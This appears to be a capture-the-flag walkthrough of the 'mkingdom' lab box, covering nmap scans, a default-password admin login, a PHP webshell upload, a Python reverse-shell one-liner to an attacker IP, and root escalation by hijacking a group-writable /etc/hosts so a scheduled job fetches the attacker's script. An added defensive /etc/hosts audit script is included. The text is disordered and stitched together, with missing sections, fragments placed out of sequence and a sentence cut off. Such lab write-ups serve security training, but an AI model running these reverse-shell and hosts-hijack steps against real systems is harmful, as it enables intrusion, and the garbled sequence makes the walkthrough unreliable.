The following post by anthonyjsaab is licensed under
0 - Introduction
1 - Port Scans
1a - Discovery
root@ip-10-10-159-131:~# nmap -sS -T4 -p- mkingdom.thm
Starting Nmap 7.60 ( https://nmap.org ) at 2024-06-15 05:44 BST
Nmap scan report for mkingdom.thm (10.10.203.199)
Host is up (0.00041s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
85/tcp open mit-ml-dev
MAC Address: 02:27:F9:0F:DC:CF (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1433.84 seconds
1b - Versions and OS
root@ip-10-10-159-131:~# nmap -A -p85 mkingdom.thm
Starting Nmap 7.60 ( https://nmap.org ) at 2024-06-15 06:18 BST
Nmap scan report for mkingdom.thm (10.10.203.199)
Host is up (0.00038s latency).
PORT STATE SERVICE VERSION
85/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 0H N0! PWN3D 4G4IN
MAC Address: 02:27:F9:0F:DC:CF (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (99%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.8 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Android 5.1 (92%), Linux 3.2 - 3.10 (92%), Linux 3.2 - 3.16 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms mkingdom.thm (10.10.203.199)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.76 seconds
root@ip-10-10-159-131:~#
The only working section I have not mentioned yet is the Login page:
Immediately after finding this page (linked from the landing page), I ran Burp's Intruder to brute-force the password (we know the user is admin from the blog post's author). However, my IP was quickly banned. I then more or less forgot about this page until I ran out of leads, at which point I tried an obvious combination: admin / admin. It didn't work. admin / password? YES! WE ARE IN!
2d - Foothold
Now I knew what to do: I had to upload a PHP webshell.
I went into "System & Settings". Under the "Files" section, there is a link to "Allowed File Types".
We now go to the file's URL indicated above:
After taking a look at the /home directory, we notice that there are two accounts we can try to break into: toad and mario.
3 - From www-data to toad
3a - Upgrading webshell to full shell
In the webshell, I ran this command built using revshells.com:
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.11.85.12",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
An nc listener catches the shell. A few well-known commands then upgrade it to a fully interactive shell.
PWD_token looked base64-encoded. After decoding it, the result was gibberish, but I suspected it might be mario's password. I tried it and it worked!
toad@mkingdom:/tmp$ su mario
Password:
mario@mkingdom:/tmp$
5 - From mario to root
Here, privilege escalation was not easy at all. At first, I tried the standard enumeration, such as:
mario@mkingdom:/tmp$ sudo -l
[sudo] password for mario:
Matching Defaults entries for mario on mkingdom:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
pwfeedback
User mario may run the following commands on mkingdom:
(ALL) /usr/bin/id
All of the classical privesc vectors were dead ends. Then, I tried to check for something only mario could do or own:
mario@mkingdom:/tmp$ ls -la /etc/ | grep mario
-rw-rw-r-- 1 root mario 342 Jan 26 19:53 hosts
That was quite unusual! Why would we have write access to /etc/hosts? Inside, we can find:
mario@mkingdom:/tmp$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 mkingdom.thm
127.0.0.1 backgroundimages.concrete5.org
127.0.0.1 www.concrete5.org
127.0.0.1 newsflow.concrete5.org
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
This is very dangerous. It means that any program that relies on /etc/hosts to resolve one of those names to 127.0.0.1 can be redirected to a host we control instead!
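A defender-side check for exactly this weakness, added here as an example and not part of the original writeup: it audits an /etc/hosts file for two things, the permission bits (the file should be owned by root and writable only by root) and entries that map names which must stay local to a non-loopback address. The LOOPBACK_ONLY list and the SAMPLE_HOSTS text are constructed for the example from the entries the writeup shows, with mkingdom.thm pointed at the attacker's VPN address 10.11.85.12 as in the modified file.

```python
import ipaddress
import os
import stat

# Names that, on this host, should only ever resolve to a loopback address.
# Constructed for this example from the entries the writeup's /etc/hosts shows;
# a real audit would take the list from the system's own configuration.
LOOPBACK_ONLY = {
    "localhost",
    "mkingdom.thm",
    "backgroundimages.concrete5.org",
    "www.concrete5.org",
    "newsflow.concrete5.org",
}

# Constructed sample: the hosts file after mkingdom.thm has been pointed at an
# outside address (10.11.85.12), as in the writeup.
SAMPLE_HOSTS = """\
127.0.0.1 localhost
10.11.85.12 mkingdom.thm
127.0.0.1 backgroundimages.concrete5.org
127.0.0.1 www.concrete5.org
127.0.0.1 newsflow.concrete5.org
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
"""


def parse_hosts(text):
    """Yield (address, [names]) for each entry, ignoring blank lines and comments."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        yield fields[0], fields[1:]


def audit_hosts(text, loopback_only=LOOPBACK_ONLY):
    """Return findings as (kind, name, address) tuples.

    'non-loopback': a name that must stay local points somewhere else.
    'duplicate':    a name is mapped to more than one address.
    'unparseable':  the address field is not a valid IP.
    """
    findings = []
    seen = {}
    for address, names in parse_hosts(text):
        try:
            ip = ipaddress.ip_address(address)
        except ValueError:
            findings.append(("unparseable", " ".join(names), address))
            continue
        for name in names:
            seen.setdefault(name, set()).add(address)
            if name in loopback_only and not ip.is_loopback:
                findings.append(("non-loopback", name, address))
    for name, addresses in seen.items():
        if len(addresses) > 1:
            findings.append(("duplicate", name, ",".join(sorted(addresses))))
    return findings


def audit_mode(st_mode, st_uid):
    """Return permission findings for the given stat() mode bits and owner uid.

    The writeup's file was -rw-rw-r-- root:mario, i.e. group-writable by a
    non-root group, which is what lets an unprivileged user rewrite it.
    """
    findings = []
    perms = stat.S_IMODE(st_mode)
    if st_uid != 0:
        findings.append("owner-not-root")
    if perms & stat.S_IWGRP:
        findings.append("group-writable")
    if perms & stat.S_IWOTH:
        findings.append("world-writable")
    return findings


if __name__ == "__main__":
    # Audit the live file when run as a script.
    path = "/etc/hosts"
    st = os.stat(path)
    print(path, audit_mode(st.st_mode, st.st_uid) or ["permissions ok"])
    with open(path) as fh:
        for finding in audit_hosts(fh.read()):
            print(*finding)
```

On the writeup's box the permission check alone would have flagged the file (mode 0664 with group mario), and the entry check catches the rewritten mkingdom.thm line; restoring 0644 root:root and keeping the names on 127.0.0.1 closes the vector, and the same checks fit naturally into a periodic integrity job.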
I tried this for starters:
www-data@mkingdom:/$ cat /etc/hosts
127.0.0.1 localhost
10.11.85.12 mkingdom.thm
127.0.0.1 backgroundimages.concrete5.org
127.0.0.1 www.concrete5.org
127.0.0.1 newsflow.concrete5.org
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
I opened Wireshark on Kali, looked at the traffic of tun0 and waited for a bit, until:
Some unknown process on the target machine is now trying to contact us on port 85! The name-resolution hijack via /etc/hosts worked!
When I opened an HTTP server on port 85, I received the connection again:
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 85
Serving HTTP on 0.0.0.0 port 85 (http://0.0.0.0:85/) ...
10.10.188.161 - - [16/Jun/2024 15:20:01] code 404, message File not found
10.10.188.161 - - [16/Jun/2024 15:20:01] "GET /app/castle/application/counter.sh HTTP/1.1" 404 -
I quickly created a Bash script that spawns a reverse shell to Kali:
The CMS used appears to be concrete5 8.5.2. Searching for vulnerabilities in this particular CMS version does not yield useful results, and its GitHub repo does not show any commits that fixed a vulnerability.
After adding PHP, I went to "Files" and uploaded .